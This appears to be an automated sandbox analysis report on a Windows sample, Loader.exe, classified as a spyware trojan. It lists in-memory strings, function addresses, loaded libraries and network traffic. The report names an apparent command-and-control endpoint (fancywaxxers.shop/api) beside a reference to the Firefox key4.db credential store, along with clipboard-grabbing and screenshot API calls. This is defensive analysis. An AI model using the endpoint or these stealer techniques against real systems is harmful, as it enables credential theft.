            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
            Source: Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Loader.exe, 00000006.00000002.3527107091.000000000329E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/
            Source: Loader.exe, 00000006.00000002.3527107091.000000000329E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/api
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apim
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003219000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop/apitd
            Source: Loader.exe, 00000006.00000002.3527107091.0000000003235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fancywaxxers.shop:443/api4p.default-release/key4.dbPK
            Source: Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
            Source: Loader.exe, 00000006.00000003.3493201418.00000000059E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: Loader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Loader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Loader.exe, 00000006.00000003.3493201418.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3508198690.00000000059D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3508412726.00000000059D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3493674605.00000000059D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: Loader.exe, 00000006.00000003.3493674605.00000000059B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: Loader.exe, 00000006.00000003.3493201418.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3508198690.00000000059D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3508412726.00000000059D8000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3493674605.00000000059D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: Loader.exe, 00000006.00000003.3493674605.00000000059B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Loader.exeString found in binary or memory: https://www.entrust.net/rpa0
            Source: Loader.exe, 00000006.00000003.3521823674.0000000005989000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
            Source: Loader.exe, 00000006.00000003.3490854232.00000000059CC000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3490986660.00000000059CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Loader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: Loader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: Loader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: Loader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: Loader.exe, 00000006.00000003.3521344950.0000000005BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
            Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
            Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
            Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50006 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50007 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50011 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50012 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:50013 version: TLS 1.2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00431E50 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,6_2_00431E50
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00431E50 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,6_2_00431E50
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004324D2 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,6_2_004324D2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002C00400_2_002C0040
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002B61070_2_002B6107
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002CB57E0_2_002CB57E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002BA9620_2_002BA962
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002CBD790_2_002CBD79
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002CDFC20_2_002CDFC2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002C00406_2_002C0040
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002B61076_2_002B6107
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002CB57E6_2_002CB57E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002BA9626_2_002BA962
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002CBD796_2_002CBD79
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002CDFC26_2_002CDFC2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004210F06_2_004210F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004371206_2_00437120
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0040C4E76_2_0040C4E7
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004087206_2_00408720
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0040BB4E6_2_0040BB4E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00418D536_2_00418D53
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00417F6B6_2_00417F6B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004160406_2_00416040
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004260606_2_00426060
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042800A6_2_0042800A
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041B0F06_2_0041B0F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042E08E6_2_0042E08E
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0040E1446_2_0040E144
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004291346_2_00429134
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004061906_2_00406190
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041719D6_2_0041719D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004251A06_2_004251A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041623C6_2_0041623C
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004092C06_2_004092C0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004222D96_2_004222D9
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041E2F06_2_0041E2F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004302F06_2_004302F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004172F56_2_004172F5
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004042906_2_00404290
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042C2BA6_2_0042C2BA
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041A3006_2_0041A300
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004383206_2_00438320
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041B3F06_2_0041B3F0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042739B6_2_0042739B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004184486_2_00418448
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004164506_2_00416450
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004074006_2_00407400
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043E4006_2_0043E400
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042B4206_2_0042B420
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004384B46_2_004384B4
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004125806_2_00412580
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0040E59B6_2_0040E59B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004196126_2_00419612
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004066206_2_00406620
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004366306_2_00436630
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004246906_2_00424690
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004177786_2_00417778
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041C7006_2_0041C700
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043E7006_2_0043E700
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004097206_2_00409720
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041D7206_2_0041D720
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004287256_2_00428725
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004157986_2_00415798
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004207B06_2_004207B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043A7B06_2_0043A7B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042D8266_2_0042D826
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004288246_2_00428824
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041682D6_2_0041682D
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004278D26_2_004278D2
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004038E06_2_004038E0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004368906_2_00436890
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004058A06_2_004058A0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004269216_2_00426921
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004089C06_2_004089C0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0040A9C06_2_0040A9C0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004259B06_2_004259B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043D9B06_2_0043D9B0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00411A5B6_2_00411A5B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00437A6B6_2_00437A6B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041DA006_2_0041DA00
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043EA106_2_0043EA10
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_004177786_2_00417778
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043DAA06_2_0043DAA0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043BABE6_2_0043BABE
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041FB526_2_0041FB52
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042EB576_2_0042EB57
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00423B226_2_00423B22
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043DBD06_2_0043DBD0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00421BE06_2_00421BE0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043ABF06_2_0043ABF0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042BB876_2_0042BB87
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00437B906_2_00437B90
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00431C006_2_00431C00
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00428C906_2_00428C90
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043ED506_2_0043ED50
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00436D606_2_00436D60
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00434D6B6_2_00434D6B
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00426DB36_2_00426DB3
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0040AE706_2_0040AE70
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041DE106_2_0041DE10
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00425E306_2_00425E30
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0040EEE06_2_0040EEE0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00402EE06_2_00402EE0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0042BEF56_2_0042BEF5
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0041CEA06_2_0041CEA0
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00435F786_2_00435F78
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00422FDB6_2_00422FDB
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043AF806_2_0043AF80
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00407F90 appears 49 times
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 002B6620 appears 94 times
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 002BE8A8 appears 42 times
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 00414A70 appears 68 times
            Source: C:\Users\user\Desktop\Loader.exeCode function: String function: 002C32AD appears 34 times
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 136
            Source: Loader.exeStatic PE information: invalid certificate
            Source: Loader.exe, 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
            Source: Loader.exe, 00000000.00000002.3527225146.000000000313E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
            Source: Loader.exe, 00000006.00000002.3526485451.00000000002EA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
            Source: Loader.exe, 00000006.00000003.3463761867.0000000004C7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
            Source: Loader.exeBinary or memory string: OriginalFilenameMuiUnattend.exej% vs Loader.exe
            Source: Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: Loader.exeStatic PE information: Section: .bss ZLIB complexity 1.000333782783418
            Source: Loader.exeStatic PE information: Section: .bss ZLIB complexity 1.000333782783418
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/4@1/1
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_00437120 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,6_2_00437120
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7476
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\78a31fe4-c08e-4f82-b625-9d6e6fd0d46bJump to behavior
            Source: Loader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Loader.exe, 00000006.00000003.3492831262.00000000059B7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000006.00000003.3493949331.0000000005985000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Loader.exeReversingLabs: Detection: 34%
            Source: C:\Users\user\Desktop\Loader.exeFile read: C:\Users\user\Desktop\Loader.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7476 -s 136
            Source: C:\Users\user\Desktop\Loader.exeProcess created: C:\Users\user\Desktop\Loader.exe "C:\Users\user\Desktop\Loader.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Loader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: Loader.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: Loader.exeStatic PE information: real checksum: 0xe2778 should be: 0xe006d
            Source: C:\Users\user\Desktop\Loader.exeCode function: 0_2_002B6743 push ecx; ret 0_2_002B6756
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_002B6743 push ecx; ret 6_2_002B6756
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043D960 push eax; mov dword ptr [esp], 30333245h6_2_0043D961
            Source: C:\Users\user\Desktop\Loader.exeCode function: 6_2_0043AB40 push eax; mov dword ptr [esp], 0704050Ah6_2_0043AB4E
            Source: C:\Users\user\Desktop\Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
